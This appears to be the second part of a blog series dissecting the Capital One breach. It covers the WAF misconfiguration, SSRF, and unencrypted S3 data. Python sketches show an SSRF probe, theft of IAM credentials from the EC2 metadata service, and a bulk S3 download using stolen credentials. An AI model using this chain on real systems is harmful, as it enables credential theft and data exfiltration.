“That is a pretty egregious oversight.”
In the second part of our three-part series on the Capital One breach, I want to discuss the vulnerabilities and other elements that went into the breach, as an autopsy of the event. (Click here if you want to catch up on part one.) The evidence suggests that while some of the factors in the Capital One breach could be perceived as unique, the key elements that allowed it to occur are actually quite common.
The first and most obvious factor is the poor RBAC controls and password management on the WAF. For what it’s worth, the WAF misconfiguration and the underlying open AWS infrastructure that allowed server-side request forgery (SSRF) are apparently frequent finds in penetration testing. According to Evan Johnson of Cloudflare, “SSRF is a bug hunters [sic] dream because it is an easy to perform attack and regularly yields critical findings.”
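To make the mechanics concrete, here is a minimal sketch of what an SSRF probe against a misconfigured front end can look like. The endpoint and the `url` parameter are hypothetical stand-ins, not the actual interface involved in the breach; the point is simply that the attacker asks the server to fetch an address only the server can reach.

```python
import requests

# Hypothetical front end that has been misconfigured so that it will fetch
# and relay whatever address is supplied to it (the classic SSRF setup).
VULNERABLE_ENDPOINT = "https://app.example.com/proxy"

# Ask the server to fetch an address that is only reachable from *inside*
# the hosting environment. If content comes back, the server is making
# requests on the attacker's behalf -- i.e., it is vulnerable to SSRF.
internal_target = "http://internal-service.local/health"

resp = requests.get(
    VULNERABLE_ENDPOINT,
    params={"url": internal_target},  # hypothetical relay parameter
    timeout=10,
)

print(resp.status_code)
print(resp.text[:500])  # any internal content here confirms the SSRF
```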
As Troy Hunt, Microsoft regional director and a data breach expert, said recently, “WAFs are great, but there should be an additional layer of security, and the underlying resources themselves need to be secure [encrypted]. For argument’s sake, if this was lack of authentication on a resource, and they were just relying on the WAF to keep people out, then that is a pretty egregious oversight.”
One should definitely question why this much sensitive data was kept unencrypted, and for so long. Since the data was stored offsite (in the cloud), best practice would dictate that the SSNs and other sensitive data be encrypted BEFORE even being sent there. If any keys needed to be shared, that policy should have been reviewed and well understood before any sensitive data went anywhere.
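As an illustration of that practice, the sketch below encrypts a record client-side before it ever touches the bucket, so that even a full compromise of the storage layer yields only ciphertext. The bucket, object key, and record are placeholders, and in production the encryption key would live in a KMS or HSM, never alongside the data.

```python
import boto3
from cryptography.fernet import Fernet

# In practice this key would be generated and held in a KMS/HSM and never
# stored next to the data; generating it inline only keeps the sketch
# self-contained.
key = Fernet.generate_key()
fernet = Fernet(key)

record = b"ssn=000-00-0000;name=Jane Doe"   # placeholder sensitive record
ciphertext = fernet.encrypt(record)          # encrypt BEFORE upload

s3 = boto3.client("s3")
s3.put_object(                               # only ciphertext leaves the premises
    Bucket="example-customer-data",          # hypothetical bucket
    Key="applications/2019/record-0001.enc",
    Body=ciphertext,
)

# Reading it back requires the key, which the cloud side never sees.
obj = s3.get_object(Bucket="example-customer-data",
                    Key="applications/2019/record-0001.enc")
plaintext = fernet.decrypt(obj["Body"].read())
```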
Regardless, once the firewall door is open (via misconfiguration), only an administrator with extensive experience with AWS configuration and architecture would be able to mitigate the issue on the cloud services side. While Capital One may not have had the extensive experience necessary to properly configure their AWS service to prevent unauthorized access, the alleged attacker certainly did, from their time working at AWS. “There’s a lot of specialized knowledge that comes with operating a service within AWS, and to someone without specialized knowledge of AWS, [SSRF attacks are] not something that would show up on any critical configuration guide,” says Evan Johnson. “The problem is common and well-known, but hard to prevent and does not have any mitigations built in to the AWS platform … The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it.”
A HackerOne blog post explains how, once an SSRF is discovered in Amazon EC2, you can often fairly easily gather metadata and other “information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more.”
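For readers unfamiliar with why that metadata is so valuable: the EC2 instance metadata service answers plain HTTP requests at a fixed link-local address, and under IMDSv1 (the only version available at the time of the breach) it requires no authentication. Below is a minimal sketch of the two requests involved; in a real attack they would be relayed through the vulnerable front end rather than fetched directly.

```python
import json
import requests

# The instance metadata service lives at a fixed link-local address that is
# only reachable from the instance itself. Shown here as direct requests to
# keep the sketch readable; an SSRF would relay them via the front end.
METADATA = "http://169.254.169.254/latest/meta-data"

# Step 1: ask which IAM role is attached to the instance.
role_name = requests.get(
    f"{METADATA}/iam/security-credentials/", timeout=5
).text.strip()

# Step 2: fetch the temporary credentials issued to that role.
creds = json.loads(
    requests.get(f"{METADATA}/iam/security-credentials/{role_name}", timeout=5).text
)

# The response contains everything needed to act as that role from anywhere.
print(creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"])
```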
Once the WAF was hijacked and the AWS servers infiltrated, exfiltrating the data was the easy part. It was made all the easier by the flat architecture of the cloud data buckets, all feeding back through a single point of protection, which turned out to be a single point of failure.
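To give a sense of how little stands between a stolen role credential and a bulk download, here is a hedged sketch using boto3. The credential values and bucket name are placeholders standing in for whatever the compromised role could reach; the real exfiltration was reportedly done with the AWS CLI’s list and sync commands, which perform essentially these same API calls under the hood.

```python
import boto3

# Temporary credentials of the kind harvested via the metadata service in the
# previous sketch; the literal values here are placeholders.
session = boto3.session.Session(
    aws_access_key_id="ASIA...EXAMPLE",
    aws_secret_access_key="example-secret-key",
    aws_session_token="example-session-token",
)
s3 = session.client("s3")

# Enumerate every bucket the over-privileged role can see...
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])

# ...then pull down the contents of any bucket of interest (placeholder name).
paginator = s3.get_paginator("list_objects_v2")
for page in paginator.paginate(Bucket="example-customer-data"):
    for obj in page.get("Contents", []):
        s3.download_file("example-customer-data", obj["Key"],
                         obj["Key"].split("/")[-1])
```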
Now that we’ve walked through the details of the vulnerabilities, in my next post I’ll cover what could have been done to address them.